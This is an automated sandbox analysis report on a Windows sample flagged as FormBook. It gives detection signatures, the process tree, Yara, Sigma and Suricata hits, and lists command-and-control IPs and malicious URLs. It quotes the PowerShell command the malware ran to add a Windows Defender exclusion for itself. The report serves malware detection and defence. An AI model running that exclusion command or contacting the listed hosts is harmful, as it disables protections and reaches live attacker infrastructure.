
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1608104
MD5: 79a197380a1362733eb1a0119879f36c
SHA1: e358e0c114af263a7b644f240499004042999090
SHA256: 06f5012aaf05a5d9aefec7a060851cf3d7ddce0220cc09b30cd87d10d69ba554
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Child Processes Of SndVol.exe
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 79A197380A1362733EB1A0119879F36C)
    • powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7876 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • file.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 79A197380A1362733EB1A0119879F36C)
      • CQcxGFiNQWzmXwbg1.exe (PID: 5768 cmdline: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\6KD1rlOtC5Adl.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • SndVol.exe (PID: 8148 cmdline: "C:\Windows\SysWOW64\SndVol.exe" MD5: BD4A1CC3429ED1251E5185A72501839B)
          • CQcxGFiNQWzmXwbg1.exe (PID: 3524 cmdline: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\yF7gWooj.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 6460 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps:
Source | Rule | Description | Author
00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Yara matches in unpacked PE files:
Source | Rule | Description | Author
4.2.file.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.file.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7448, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7656, ProcessName: powershell.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7448, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7656, ProcessName: powershell.exe

Source: Process started
Author: X__Junior (Nextron Systems)
Data: Command: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\yF7gWooj.exe" , CommandLine: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\yF7gWooj.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe, NewProcessName: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe, OriginalFileName: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe, ParentCommandLine: "C:\Windows\SysWOW64\SndVol.exe", ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 8148, ParentProcessName: SndVol.exe, ProcessCommandLine: "C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\yF7gWooj.exe" , ProcessId: 3524, ProcessName: CQcxGFiNQWzmXwbg1.exe

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7448, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7656, ProcessName: powershell.exe
Suricata alerts, SID 2855465:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-06T08:48:19.575571+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49979 | 192.186.58.31 | 80 | TCP
2025-02-06T08:48:43.589523+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49984 | 92.60.36.190 | 80 | TCP
2025-02-06T08:48:56.962781+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49988 | 188.114.96.3 | 80 | TCP
2025-02-06T08:49:10.322023+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49992 | 144.76.229.203 | 80 | TCP
2025-02-06T08:49:25.461509+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49996 | 103.117.135.13 | 80 | TCP
2025-02-06T08:49:38.980894+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50000 | 13.248.169.48 | 80 | TCP
2025-02-06T08:49:52.144458+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50004 | 13.248.169.48 | 80 | TCP
2025-02-06T08:50:06.317624+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50008 | 129.226.111.122 | 80 | TCP
2025-02-06T08:50:19.482834+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50012 | 84.32.84.32 | 80 | TCP
2025-02-06T08:50:32.776450+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50016 | 192.64.118.221 | 80 | TCP
2025-02-06T08:50:47.164635+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50020 | 198.187.31.216 | 80 | TCP
2025-02-06T08:51:01.537021+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50024 | 47.83.1.90 | 80 | TCP
2025-02-06T08:51:18.177810+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50028 | 46.38.243.234 | 80 | TCP
2025-02-06T08:51:32.449665+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50032 | 47.83.1.90 | 80 | TCP
Suricata alerts, SID 2855464:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-06T08:48:35.905320+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49981 | 92.60.36.190 | 80 | TCP
2025-02-06T08:48:38.452165+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49982 | 92.60.36.190 | 80 | TCP
2025-02-06T08:48:40.995860+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49983 | 92.60.36.190 | 80 | TCP
2025-02-06T08:48:49.287237+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49985 | 188.114.96.3 | 80 | TCP
2025-02-06T08:48:51.859078+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49986 | 188.114.96.3 | 80 | TCP
2025-02-06T08:48:54.377456+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49987 | 188.114.96.3 | 80 | TCP
2025-02-06T08:49:02.677256+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49989 | 144.76.229.203 | 80 | TCP
2025-02-06T08:49:05.220354+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49990 | 144.76.229.203 | 80 | TCP
2025-02-06T08:49:07.777664+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49991 | 144.76.229.203 | 80 | TCP
2025-02-06T08:49:17.793048+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49993 | 103.117.135.13 | 80 | TCP
2025-02-06T08:49:20.358560+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49994 | 103.117.135.13 | 80 | TCP
2025-02-06T08:49:22.896494+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49995 | 103.117.135.13 | 80 | TCP
2025-02-06T08:49:31.305661+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49997 | 13.248.169.48 | 80 | TCP
2025-02-06T08:49:33.862128+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49998 | 13.248.169.48 | 80 | TCP
2025-02-06T08:49:36.431046+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49999 | 13.248.169.48 | 80 | TCP
2025-02-06T08:49:44.486669+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50001 | 13.248.169.48 | 80 | TCP
2025-02-06T08:49:47.049714+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50002 | 13.248.169.48 | 80 | TCP
2025-02-06T08:49:50.650724+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50003 | 13.248.169.48 | 80 | TCP
2025-02-06T08:49:58.705343+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50005 | 129.226.111.122 | 80 | TCP
2025-02-06T08:50:01.246079+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50006 | 129.226.111.122 | 80 | TCP
2025-02-06T08:50:03.786946+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50007 | 129.226.111.122 | 80 | TCP
2025-02-06T08:50:11.870960+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50009 | 84.32.84.32 | 80 | TCP
2025-02-06T08:50:14.388711+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50010 | 84.32.84.32 | 80 | TCP
2025-02-06T08:50:16.932530+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50011 | 84.32.84.32 | 80 | TCP
2025-02-06T08:50:25.113741+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50013 | 192.64.118.221 | 80 | TCP
2025-02-06T08:50:27.654035+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50014 | 192.64.118.221 | 80 | TCP
2025-02-06T08:50:30.240218+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50015 | 192.64.118.221 | 80 | TCP
2025-02-06T08:50:38.495696+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50017 | 198.187.31.216 | 80 | TCP
2025-02-06T08:50:41.059127+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50018 | 198.187.31.216 | 80 | TCP
2025-02-06T08:50:44.663255+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50019 | 198.187.31.216 | 80 | TCP
2025-02-06T08:50:53.699407+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50021 | 47.83.1.90 | 80 | TCP
2025-02-06T08:50:56.306736+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50022 | 47.83.1.90 | 80 | TCP
2025-02-06T08:50:58.939729+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50023 | 47.83.1.90 | 80 | TCP
2025-02-06T08:51:08.103558+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50025 | 46.38.243.234 | 80 | TCP
2025-02-06T08:51:10.666081+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50026 | 46.38.243.234 | 80 | TCP
2025-02-06T08:51:13.212946+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50027 | 46.38.243.234 | 80 | TCP
2025-02-06T08:51:24.701142+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50029 | 47.83.1.90 | 80 | TCP
2025-02-06T08:51:27.291133+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50030 | 47.83.1.90 | 80 | TCP
2025-02-06T08:51:29.837981+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50031 | 47.83.1.90 | 80 | TCP

                AV Detection

Source: http://www.gnlokn.info/1hqx/ | Avira URL Cloud: Label: malware
Source: http://www.82765.ltd/extg/ | Avira URL Cloud: Label: phishing
Source: http://www.031235246.xyz/an37/?b8IlRP=EOo17e0b13RAPxLblUgE3vs/FGL0H2xQV++ddtKGVI4dgn5cY1anvW0mUjQ935dHimnK6XuAvySysVP8xdezNg5a6QtKc14a9RVleSg6ym/yobsLmIbuxYM=&gbp=5DC0NPr0EBEhl | Avira URL Cloud: Label: malware
Source: file.exe | Virustotal: Detection: 30%
Source: file.exe | ReversingLabs: Detection: 34%
Source: Yara match | File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3757230807.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1671316261.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3768471999.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: SndVol.pdbGCTL | source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: file.exe, 00000004.00000002.1669747825.00000000016E0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1677267972.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1669757476.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.000000000523E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: file.exe, file.exe, 00000004.00000002.1669747825.00000000016E0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, SndVol.exe, 00000009.00000003.1677267972.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1669757476.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.000000000523E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: SndVol.pdb | source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584029398.0000000000C0F000.00000002.00000001.01000000.0000000C.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1745800573.0000000000C0F000.00000002.00000001.01000000.0000000C.sdmp
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030AC7E0 FindFirstFileW,FindNextFileW,FindClose, | 9_2_030AC7E0
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 4x nop then xor eax, eax | 9_2_03099F10
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 4x nop then mov ebx, 00000004h | 9_2_04F804DE

                Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49979 -> 192.186.58.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50002 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49996 -> 103.117.135.13:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49981 -> 92.60.36.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49986 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49992 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49995 -> 103.117.135.13:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49993 -> 103.117.135.13:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50006 -> 129.226.111.122:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50000 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50005 -> 129.226.111.122:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50014 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49999 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49990 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50003 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49984 -> 92.60.36.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50020 -> 198.187.31.216:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50025 -> 46.38.243.234:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49991 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50007 -> 129.226.111.122:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50019 -> 198.187.31.216:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50026 -> 46.38.243.234:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50001 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49994 -> 103.117.135.13:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50013 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50008 -> 129.226.111.122:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49985 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50004 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50029 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49983 -> 92.60.36.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49997 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50028 -> 46.38.243.234:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50022 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50017 -> 198.187.31.216:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50011 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50021 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50010 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50031 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50024 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49988 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50023 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50009 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50018 -> 198.187.31.216:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50030 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49982 -> 92.60.36.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50016 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50027 -> 46.38.243.234:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50015 -> 192.64.118.221:80
